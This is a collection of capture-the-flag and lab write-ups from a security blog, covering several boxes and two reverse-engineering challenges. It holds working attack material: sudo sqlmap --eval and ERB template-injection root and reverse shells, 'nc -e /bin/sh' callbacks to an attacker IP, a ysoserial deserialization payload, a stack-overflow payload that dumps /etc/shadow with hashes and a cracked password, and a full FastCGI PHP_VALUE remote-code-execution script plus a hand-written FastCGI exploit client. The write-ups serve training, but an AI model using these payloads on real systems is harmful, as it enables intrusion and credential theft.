    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User andeli may run the following commands on New:
    (ALL) NOPASSWD: /usr/bin/sqlmap

sqlmap can be run as root.

andeli@New:~$ sudo sqlmap -u 127.0.0.1 --eval="import os; os.system('/bin/sh')"
        ___
       __H__                                                                                                                              
 ___ ___[)]_____ ___ ___  {1.5.2#stable}                                                                                                  
|_ -| . ["]     | .'| . |                                                                                                                 
|___|_  [,]_|_|_|__,|  _|                                                                                                                 
      |_|V...       |_|   http://sqlmap.org                                                                                               

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 20:43:51 /2025-07-01/

[20:43:51] [INFO] testing connection to the target URL
# id
uid=0(root) gid=0(root) groups=0(root)
# 
yulian
https://dirtycow.cn/300.html
Mon, 30 Jun 2025 00:20:00 +0800, Inf0

Web foothold

image-20250625125350343.png

The page is a simulated terminal that executes commands.

image-20250625125435114.png

View the file /opt/code/test.c.

It is a pseudo-random generator; running the code yields three numbers.

image-20250625125627753.png

Port-knock with those three numbers and port 8080 opens.

image-20250630003121432.png

Visit port 8080; password brute-forcing gives admin/123457.

Directory scanning finds the endpoint /download.

Fuzzing the parameter name finds file, which allows arbitrary file read.

Read /proc/self/maps to inspect the process memory map.

image-20250625130035544.png

This reveals /app/javaserver-0.0.1-SNAPSHOT.jar.

Use the same endpoint to read the jar.

Decompiling it reveals a deserialization endpoint.

image-20250625130317874.png

Go straight for a CommonsCollections gadget chain.

Generate a reverse-shell payload with ysoserial.

image-20250625130758468.png

image-20250625130932791.png

Send the payload with the session cookie to get a shell.

Internal lateral movement

Upload frp and set up a SOCKS proxy.

Scan the internal hosts with fscan or similar tools.

An internal host, 172.17.0.2, is found with ports 80 and 22 open.

image-20250630003224744.png

Port 80 serves an explainer about brute-forcing; at the very bottom there is a comment reading 500-worst-passwords.

That is a wordlist from SecLists; brute-forcing root@172.17.0.2 with it gives root/mountain.

SSH in; a suspicious file, userLogin, is found in /usr/bin.

image-20250625131839654.png

IDA analysis

image-20250625132049440.png

A file-encryption function; step into it.

image-20250625132126112.png

image-20250625132132053.png

Standard XTEA encryption.

image-20250625132213818.png

Find the key and the output file.

Because the key and the name of the file being read are both constants, IDA merged the two values together here.

The XTEA key is 16 bytes, split into 4 words for encryption.

key-for-user-ldz is the key, and id_ed25519 is the name of the file being read.

Clearly a private key; write a script to decrypt output.enc.

image-20250625132545311.png

The file is found under /etc/.

Extract it and decrypt.

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

#define BLOCK_SIZE 8   /* XTEA block: two 32-bit words */
#define ROUNDS 64      /* number of cycles the binary runs; sum starts at delta*ROUNDS */

/* 16-byte key recovered from the binary; loaded below as four little-endian words */
const char FIXED_KEY_STR[16] = "key-for-user-ldz";
const char *INPUT_FILE = "output.enc";
const char *OUTPUT_FILE = "decrypted.txt";

/* Decrypt one 64-bit block: the encryption rounds applied in reverse */
void xtea_decrypt(uint32_t v[2], const uint32_t key[4]) {
    uint32_t v0 = v[0], v1 = v[1];
    uint32_t delta = 0x9E3779B9, sum = delta * ROUNDS;
    for (int i = 0; i < ROUNDS; ++i) {
        v1 -= (((v0 << 4) ^ (v0 >> 5)) + v0) ^ (sum + key[(sum >> 11) & 3]);
        sum -= delta;
        v0 -= (((v1 << 4) ^ (v1 >> 5)) + v1) ^ (sum + key[sum & 3]);
    }
    v[0] = v0; v[1] = v1;
}

/* Split the 16 key bytes into 4 little-endian uint32 words
   (cast through uint8_t so a signed char can never sign-extend) */
void key_from_fixed_string(uint32_t key[4]) {
    for (int i = 0; i < 4; ++i) {
        key[i] = ((uint32_t)(uint8_t)FIXED_KEY_STR[i*4]) |
                 ((uint32_t)(uint8_t)FIXED_KEY_STR[i*4 + 1] << 8) |
                 ((uint32_t)(uint8_t)FIXED_KEY_STR[i*4 + 2] << 16) |
                 ((uint32_t)(uint8_t)FIXED_KEY_STR[i*4 + 3] << 24);
    }
}

/* Decrypt INPUT_FILE block by block; a trailing partial block is ignored */
void decrypt_file() {
    FILE *fin = fopen(INPUT_FILE, "rb");
    FILE *fout = fopen(OUTPUT_FILE, "wb");
    if (!fin || !fout) {
        perror("文件打开失败");
        exit(1);
    }

    uint32_t key[4];
    key_from_fixed_string(key);

    uint8_t buffer[BLOCK_SIZE];
    size_t read_size;
    while ((read_size = fread(buffer, 1, BLOCK_SIZE, fin)) == BLOCK_SIZE) {
        uint32_t block[2];
        memcpy(block, buffer, BLOCK_SIZE);
        xtea_decrypt(block, key);
        fwrite(block, 1, BLOCK_SIZE, fout);
    }

    fclose(fin);
    fclose(fout);
    printf("解密完成:%s → %s\n", INPUT_FILE, OUTPUT_FILE);
}

int main() {
    decrypt_file();
    return 0;
}

Inspect the decrypted file.

image-20250625132820366.png

It is a private key; chmod it to 600. From the decryption key's name, it is user ldz's private key.

Log in as that user.

image-20250625133012806.png

Privilege escalation

localhost:~$ find / -perm -4000 2>/dev/null
/opt/vuln
/bin/bbsuid

Check the SUID binaries.

There is a vuln binary; analyze it in IDA.

image-20250625133214597.png

Setting flag=1 makes it execute the secret() function.

image-20250625133252635.png

That function reads /etc/shadow.

This is clearly a stack overflow that overwrites the value of flag to bypass the check.

payload:

localhost:~$ python -c "print('A'*44 + '\x01\x00\x00\x00')" | /opt/vuln
root:$6$W5FUwrTeo8vXfNot$qJazigaYSqk8ezVfjHckZb2XjxkrJsniQa5MA1o.j9apE1BMYX5vYuJVEJ2hYbNsR0q9IWOSSt1I40vNYxvKO0:20263:0:::::
bin:!::0:::::
daemon:!::0:::::
lp:!::0:::::
sync:!::0:::::
shutdown:!::0:::::
halt:!::0:::::
mail:!::0:::::
news:!::0:::::
uucp:!::0:::::
cron:!::0:::::
ftp:!::0:::::
sshd:!::0:::::
games:!::0:::::
ntp:!::0:::::
guest:!::0:::::
nobody:!::0:::::
klogd:!:20205:0:99999:7:::
chrony:!:20205:0:99999:7:::
ldz:$6$qCU7eP8wj/Pvo1FB$Ooou6p.TF3M/kMB29XrzQ6XVNbq7c46lGzNvRPOJ55GAXJ0h.jmbc8VHhGjFgwXLHPSbNt96l/rmUYgDqpo8Y0:20263:0:99999:7:::
nginx:!:20263:0:99999:7:::

/etc/shadow read successfully
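The 44-byte offset above was found by hand; the way to get it systematically is to send a de Bruijn (cyclic) pattern instead of 'A's, read back the 4 bytes that landed in flag (or in a register at the crash) and look them up in the pattern. This is an added example, not code from the original writeup: a minimal pwntools-style cyclic/cyclic_find plus the payload builder for this binary. The alphabet is the lowercase one pwntools defaults to; nothing about /opt/vuln beyond the 44/4 layout described above is assumed.

```python
import struct
from itertools import islice

ALPHABET = b"abcdefghijklmnopqrstuvwxyz"   # same default alphabet pwntools uses


def de_bruijn(alphabet=ALPHABET, n=4):
    """Lazily yield the de Bruijn sequence B(k, n): every n-byte window occurs exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for i in range(1, p + 1):
                    yield alphabet[a[i]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    yield from db(1, 1)


def cyclic(length, n=4):
    """Pattern to feed the program instead of 'A' * N."""
    return bytes(islice(de_bruijn(ALPHABET, n), length))


def cyclic_find(subseq, n=4):
    """Offset of the first n bytes of subseq inside the pattern, or -1 if absent."""
    subseq = bytes(subseq[:n])
    window = bytearray()
    for idx, b in enumerate(de_bruijn(ALPHABET, n)):
        window.append(b)
        if len(window) > n:
            del window[0]
        if window == subseq:
            return idx - n + 1
    return -1


def offset_from_register(value, n=4):
    """The 32-bit value seen in the clobbered variable (or a register) after the crash,
    converted back to the little-endian bytes that were written there."""
    return cyclic_find(struct.pack("<I", value & 0xFFFFFFFF), n)


def build_payload(offset, value, width=4):
    """Padding up to the variable, then the little-endian value that overwrites it."""
    fmt = {4: "<I", 8: "<Q"}[width]
    return b"A" * offset + struct.pack(fmt, value)


if __name__ == "__main__":
    import sys
    # python3 this.py 200        -> pattern to pipe into /opt/vuln
    # python3 this.py 0x6161616c -> offset of that value in the pattern
    arg = sys.argv[1]
    if arg.startswith("0x"):
        print(offset_from_register(int(arg, 16)))
    else:
        sys.stdout.buffer.write(cyclic(int(arg)) + b"\n")
```

With the offset known, `build_payload(44, 1)` reproduces the page's payload byte for byte; the same function with `width=8` serves 64-bit targets.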

Crack the root hash offline with john (the "No password hashes left to crack" message means this hash was already cracked in an earlier run and sits in john.pot, which is what --show prints)

┌──(root㉿kali)-[~]
└─# john --format=sha512crypt --wordlist=rockyou.txt hash       
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
No password hashes left to crack (see FAQ)
                                                                                                                                               
┌──(root㉿kali)-[~]
└─# john hash --show                                     
root:yulianateamo:20263:0:::::

1 password hash cracked, 0 left


┌──(root㉿kali)-[~]
└─# ssh root@10.20.73.10                
root@10.20.73.10's password: 

localhost:~# 
localhost:~# 
localhost:~# ls
root.txt
localhost:~# cat root.txt 
flag{98ecb90d5dcef41e1bd18f47697f287a}
localhost:~# 

7th Zhejiang Provincial College Student Network and Information Security Competition Finals, reverse WP https://dirtycow.cn/269.html Sat, 09 Nov 2024 17:51:00 +0800 Inf0 Reverse1

Approach:

64-bit ELF

image-20241110155524669.png

Analyse it in IDA

image-20241110160145828.png

Look at these functions

init initialises a 256-byte table: at a glance, the RC4 key-scheduling algorithm

image-20241110160217367.png

crypt1 and crypt2 are a modified RC4 PRGA

image-20241110160408630.png

before_main encrypts the key ("ban_debug!") with RC4 under the key "keykey"

image-20241110162211876.png

after_main uses that encrypted key as the RC4 key to encrypt the flag

image-20241110162622396.png

exp:

def init(s, key, key_len):
    # RC4 KSA: fill the S-box, then scramble it with the key
    v8 = [0] * 258
    for i in range(256):
        s[i] = i
        v8[i] = key[i % key_len]
    v6 = 0
    for j in range(256):
        v6 = (v8[j] + v6 + s[j]) % 256
        s[j], s[v6] = s[v6], s[j]


def crypt1(s, key, key_len):
    # standard RC4 PRGA: XOR each byte with the keystream (what before_main does)
    v5 = v6 = 0
    res = []
    for i in range(key_len):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        res.append(key[i] ^ s[(s[v5] + s[v6]) % 256])
    return res


def crypt2(s, enc, enc_len):
    # modified PRGA used by after_main: the keystream byte was subtracted from the
    # plaintext instead of XORed, so recovery adds it back
    v5 = v6 = 0
    res = []
    for i in range(enc_len):
        v5 = (v5 + 1) % 256
        v6 = (v6 + s[v5]) % 256
        s[v5], s[v6] = s[v6], s[v5]
        res.append(enc[i] + s[(s[v5] + s[v6]) % 256])
    return res


# step 1: before_main encrypts "ban_debug!" with RC4 under the key "keykey"
s = [0] * 256
key1 = [ord(b) for b in "keykey"]
key = [ord(b) for b in "ban_debug!"]
init(s, key1, len(key1))
res = crypt1(s, key, len(key))
print(res)

# step 2: after_main uses that result as the key for the modified RC4 over the flag
s2 = [0] * 256
init(s2, res, len(res))

enc = [0x4E, 0x47, 0x38, 0x47, 0x62, 0x0A, 0x79, 0x6A, 0x03, 0x66,
       0xC0, 0x69, 0x8D, 0x1C, 0x84, 0x0F, 0x54, 0x4A, 0x3B, 0x08,
       0xE3, 0x30, 0x4F, 0xB9, 0x6C, 0xAB, 0x36, 0x24, 0x52, 0x81,
       0xCF]
flag = crypt2(s2, enc, len(enc))

for i in flag:
    print(chr(i % 256), end="")   # the sum can exceed 255, hence the mod


'''
Output
[105, 13, 90, 178, 64, 234, 25, 63, 47, 106]
flag{1237-12938-9372-1923-4u92}
'''
    

reverse2

Approach:

It is UPX-packed; check in a hex editor whether the UPX signature has been tampered with

image-20241110164828280.png

Changing the three "ABC" markers back to "UPX" lets the stock unpacker strip the packer

image-20241110164949354.png

Analyse the code in IDA

main contains a ciphertext

image-20241110165204829.png

Further down is an obvious base64 routine; look at the a9876543210zyxw array

image-20241110165249211.png

base64 with a custom table

image-20241110165347969.png

exp:

CyberChef does it in one go

image-20241110165557240.png
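When CyberChef is not at hand, the custom table can be handled in a few lines. This is an added example, not part of the original writeup: a base64 decoder/encoder parameterised by the alphabet, with a standard-table self-check. The challenge's actual table is not reproduced in the text (only the array name a9876543210zyxw is visible in the screenshot), so CUSTOM below is a constructed table used only to exercise the code; substitute the 64 bytes pulled from the binary.

```python
import base64

STD = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
# Constructed demonstration table (assumption, not the competition's table).
CUSTOM = b"9876543210zyxwvutsrqponmlkjihgfedcbaZYXWVUTSRQPONMLKJIHGFEDCBA+/"


def _check_table(table):
    if len(table) != 64 or len(set(table)) != 64 or b"=" in table:
        raise ValueError("table must be 64 distinct bytes and must not contain '='")


def custom_b64decode(data, table):
    """Decode base64 text written with `table` as its alphabet ('=' padding is standard)."""
    _check_table(table)
    lut = {c: i for i, c in enumerate(table)}
    bits = nbits = 0
    out = bytearray()
    for c in data.rstrip(b"="):
        if c not in lut:
            raise ValueError("byte %r is not in the alphabet" % bytes([c]))
        bits = (bits << 6) | lut[c]      # accumulate 6 bits per symbol
        nbits += 6
        if nbits >= 8:                   # emit a byte whenever 8 bits are available
            nbits -= 8
            out.append((bits >> nbits) & 0xFF)
    return bytes(out)


def custom_b64encode(raw, table):
    """Inverse of custom_b64decode: 3 input bytes -> 4 symbols, '=' padded."""
    _check_table(table)
    out = bytearray()
    for i in range(0, len(raw), 3):
        chunk = raw[i:i + 3]
        n = int.from_bytes(chunk.ljust(3, b"\0"), "big")
        groups = [(n >> 18) & 63, (n >> 12) & 63, (n >> 6) & 63, n & 63]
        keep = len(chunk) + 1            # 1 byte -> 2 symbols, 2 bytes -> 3, 3 bytes -> 4
        out += bytes(table[g] for g in groups[:keep]) + b"=" * (4 - keep)
    return bytes(out)


def selfcheck(sample=b"flag{check}"):
    """With the standard table the routines must agree with the stdlib."""
    return (custom_b64encode(sample, STD) == base64.b64encode(sample)
            and custom_b64decode(base64.b64encode(sample), STD) == sample)


if __name__ == "__main__":
    ct = custom_b64encode(b"flag{demo}", CUSTOM)
    print(ct, custom_b64decode(ct, CUSTOM))
```

The decoder refuses a table that is not a 64-byte permutation, which is the first thing to check when the array copied out of IDA turns out to be truncated or to carry a trailing NUL.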

hackingtoys https://dirtycow.cn/256.html Mon, 16 Sep 2024 21:30:00 +0800 Inf0 Information gathering

Port scan with nmap

nmap -sS 10.20.73.121 -T4
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:48 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00010s latency).
Not shown: 998 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 00:0C:29:82:76:43 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

Ports 22 and 3000 are open; run nmap -sV against them for service detection

┌──(root㉿kali)-[~]
└─# nmap -sV  10.20.73.121 -p3000,22
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-16 03:49 EDT
Nmap scan report for hacktoys.lan (10.20.73.121)
Host is up (0.00031s latency).

PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0)
3000/tcp open  ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.93%T=SSL%I=7%D=9/16%Time=66E7E361%P=x86_64-pc-linux-gn
SF:u%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-Len
SF:gth:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HTTP\
SF:x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20open\
SF:x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20\(Puma::H
SF:ttpParserError\)\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/li
SF:b/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1\.0
SF:/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:298:i
SF:n\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\
SF:.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rvm/g
SF:ems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`wake
SF:up!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/react
SF:or\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ruby-
SF:3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/usr/
SF:local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:i
SF:n\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x20F
SF:orbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-Len
SF:gth:\x205702\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n
SF:\x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20<meta\x20name=\"viewp
SF:ort\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20\x20<
SF:meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x20<t
SF:itle>Action\x20Controller:\x20Exception\x20caught</title>\n\x20\x20<sty
SF:le>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-colo
SF:r:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x20\x
SF:20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20supp
SF:orted-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20margin:
SF:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x20ul
SF:,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20ver
SF:dana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x20\
SF:x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x20\x
SF:20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-size:
SF:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x20\
SF:x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20bord
SF:er:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010px;
SF:\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20widt
SF:h:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20\x2
SF:0\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20background
SF::\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:");
MAC Address: 00:0C:29:82:76:43 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.17 seconds

nmap reports SSL on 3000, so browse to it over https

image-20240916160728361.png

Vulnerability discovery

Web foothold

The page has five links; as shown, each points to a hacking tool

image-20240916171846634.png

Next, test the input box underneath

image-20240916172453682.png

Any input returns the message Product does not exist

That string is the value of the message parameter; change message to 123

image-20240916172632531.png

The message now reads 123, so there is clearly reflected XSS

Not useful for getting in, though

image-20240916173245082.png

The site is written in Ruby

image-20240916173606124.png

Ruby/ERB SSTI

Searching shows this is ERB server-side template injection: anything inside <%= (ruby code) %> is evaluated

Test it by passing <%= 7*7 %>, URL-encoded, as the parameter

image-20240916180036622.png

The response shows 49, confirming the vulnerability

Try a reverse shell

Build the reverse-shell payload

<%= system("nc -e /bin/sh 10.20.73.233 5555"); %>

image-20240916182939850.png

Python is available, so spawn a pty for a proper terminal

python3 -c "import pty;pty.spawn('/bin/bash')"

image-20240916183154924.png

Privilege escalation

image-20240916200655562.png

Ports 80 and 9000 are listening on localhost only; forward both out with socat

lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 & 
<CP-LISTEN:9001,reuseaddr,fork TCP:127.0.0.1:9000 & 
[1] 1281
lidia@hacktoys:/tmp$ ./socat TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 & 
< TCP-LISTEN:8080,reuseaddr,fork TCP:127.0.0.1:80 & 
[2] 1282
lidia@hacktoys:/tmp$ ss -nltp 
ss -nltp 
State  Recv-Q Send-Q Local Address:Port Peer Address:PortProcess                         
LISTEN 0      5            0.0.0.0:8080      0.0.0.0:*    users:(("socat",pid=1282,fd=5))
LISTEN 0      511        127.0.0.1:80        0.0.0.0:*                                   
LISTEN 0      128          0.0.0.0:22        0.0.0.0:*                                   
LISTEN 0      4096       127.0.0.1:9000      0.0.0.0:*                                   
LISTEN 0      1024         0.0.0.0:3000      0.0.0.0:*    users:(("ruby",pid=593,fd=7))  
LISTEN 0      5            0.0.0.0:9001      0.0.0.0:*    users:(("socat",pid=1281,fd=5))
LISTEN 0      128             [::]:22           [::]:*                                                                

Browse the forwarded port 80

image-20240916202945326.png

After a lot of testing nothing exploitable turned up there

Move on to port 9000

image-20240916203819728.png

The process list shows php-fpm, whose default port is exactly 9000

https://book.hacktricks.xyz/network-services-pentesting/9000-pentesting-fastcgi

The script from that page gives direct command execution through FastCGI: php-fpm accepts PHP_VALUE from the FastCGI parameters, so a client that can reach the socket can enable allow_url_include and prepend its own code to any existing .php file

Change the port and the script path and it works as-is

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('whoami'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Existing file path on the target

HOST=$1
B64=$(echo "$PAYLOAD"|base64|tr -d '\n')   # drop the line wrapping GNU base64 adds past 76 chars

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    # PHP_VALUE overrides php.ini for this request: allow URL includes and prepend our
    # payload as a data:// file, so it runs before the real script does
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT   # 9001 is the socat forward to 127.0.0.1:9000

    cat $OUTPUT
done
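The script above leans on cgi-fcgi to speak the protocol. What it actually puts on the wire is small enough to write by hand, which is useful when cgi-fcgi is not installed on the pivot host or when you want to see the raw STDOUT/STDERR records php-fpm returns. This is an added example, not from the original post or HackTricks: a minimal FastCGI client in Python that builds the BEGIN_REQUEST/PARAMS/STDIN records, parses the response, and reproduces the PHP_VALUE trick with the same escaping as the shell script. The host, port and script path are whatever you pass in; nothing else about the target is assumed.

```python
import base64
import socket
import struct

FCGI_VERSION = 1
FCGI_BEGIN_REQUEST, FCGI_ABORT_REQUEST, FCGI_END_REQUEST = 1, 2, 3
FCGI_PARAMS, FCGI_STDIN, FCGI_STDOUT, FCGI_STDERR = 4, 5, 6, 7
FCGI_RESPONDER = 1
HEADER = ">BBHHBx"   # version, type, requestId, contentLength, paddingLength, reserved


def fcgi_record(rtype, content, request_id=1):
    """One FastCGI record: 8-byte big-endian header, content, zero padding to 8 bytes."""
    if len(content) > 0xFFFF:
        raise ValueError("record content must fit in 16 bits; split it across records")
    padding = (8 - len(content) % 8) % 8
    return struct.pack(HEADER, FCGI_VERSION, rtype, request_id, len(content), padding) + content + b"\0" * padding


def _nv_len(n):
    # name/value lengths below 128 take one byte, larger ones four bytes with the top bit set
    return bytes([n]) if n < 0x80 else struct.pack(">I", n | 0x80000000)


def encode_nv(name, value):
    return _nv_len(len(name)) + _nv_len(len(value)) + name + value


def build_request(params, stdin=b"", request_id=1):
    """BEGIN_REQUEST, PARAMS plus empty terminator, STDIN plus empty terminator."""
    begin = struct.pack(">HB5x", FCGI_RESPONDER, 0)   # role, flags (0 = close after response)
    body = b"".join(encode_nv(k.encode(), v.encode()) for k, v in params.items())
    return (fcgi_record(FCGI_BEGIN_REQUEST, begin, request_id)
            + fcgi_record(FCGI_PARAMS, body, request_id)
            + fcgi_record(FCGI_PARAMS, b"", request_id)
            + (fcgi_record(FCGI_STDIN, stdin, request_id) if stdin else b"")
            + fcgi_record(FCGI_STDIN, b"", request_id))


def parse_records(data):
    """Split a raw FastCGI byte stream into (type, request_id, content) tuples."""
    out, off = [], 0
    while off + 8 <= len(data):
        _, rtype, rid, clen, plen = struct.unpack(HEADER, data[off:off + 8])
        off += 8
        out.append((rtype, rid, data[off:off + clen]))
        off += clen + plen
    return out


def php_rce_params(script_filename, php_code, method="POST"):
    """Same trick as the shell script: PHP_VALUE enables URL includes and prepends a data:// file."""
    b64 = base64.b64encode(php_code.encode()).decode()
    return {
        "SCRIPT_FILENAME": script_filename,     # must be an existing .php file on the target
        "SCRIPT_NAME": script_filename,
        "REQUEST_METHOD": method,
        "PHP_VALUE": "allow_url_include=1\nallow_url_fopen=1\n"
                     "auto_prepend_file='data://text/plain\\;base64," + b64 + "'",
    }


def send_request(host, port, params, stdin=b"", timeout=10):
    """Send one request to php-fpm (or a forward in front of it) and return the joined STDOUT."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(params, stdin))
        chunks = []
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return b"".join(c for t, _, c in parse_records(b"".join(chunks)) if t == FCGI_STDOUT)


if __name__ == "__main__":
    import sys
    host, port = sys.argv[1], int(sys.argv[2])   # e.g. the 9001 socat forward from above
    params = php_rce_params("/var/www/html/index.php", "<?php echo '<!--'; system('id'); echo '-->';")
    print(send_request(host, port, params).decode(errors="replace"))
```

The empty PARAMS and STDIN records are not optional: php-fpm waits for them before it starts the script, so a client that omits them simply hangs until the timeout.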

image-20240916205923580.png

The command runs as user dodi, so use the same primitive to reverse-shell as that user

Escalate to dodi

Change the executed command

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 10.20.73.233 6666'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Existing file path on the target

HOST=$1
B64=$(echo "$PAYLOAD"|base64|tr -d '\n')   # this payload is long enough for base64 to wrap it; keep it on one line

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9001 &> $OUTPUT

    cat $OUTPUT
done

image-20240916210302784.png

Escalate to root

sudo -l shows this user may run the script /usr/local/bin/rvm_rails.sh with sudo

image-20240916210822816.png

Run the script

dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
Usage:
  rails COMMAND [options]

You must specify a command:

  new          Create a new Rails application. "rails new my_app" creates a
               new application called MyApp in "./my_app"
  plugin new   Create a new Rails railtie or engine

All commands can be run with -h (or --help) for more information.

Inside a Rails application directory, some common commands are:

  console      Start the Rails console
  server       Start the Rails server
  test         Run tests except system tests

It is rails

Rails is a web application framework written in Ruby

Analyse the script

#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"

After setting up the environment the script exec's /usr/local/rvm/gems/ruby-3.1.0/bin/rails

image-20240916211743699.png

dodi@hacktoys:/var/www/html$ cat /etc/group | grep rvm
cat /etc/group | grep rvm
rvm:x:1002:lidia,root

lidia, a member of the rvm group, has write access to that file. Overwrite it with /bin/bash as lidia, then run the sudo wrapper as dodi: root executes whatever is now in the rails file

lidia@hacktoys:/tmp$ echo "/bin/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
<in/bash" > /usr/local/rvm/gems/ruby-3.1.0/bin/rails
lidia@hacktoys:/tmp$ 
dodi@hacktoys:/var/www/html$ sudo /usr/local/bin/rvm_rails.sh
sudo /usr/local/bin/rvm_rails.sh
root@hacktoys:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root),1002(rvm)
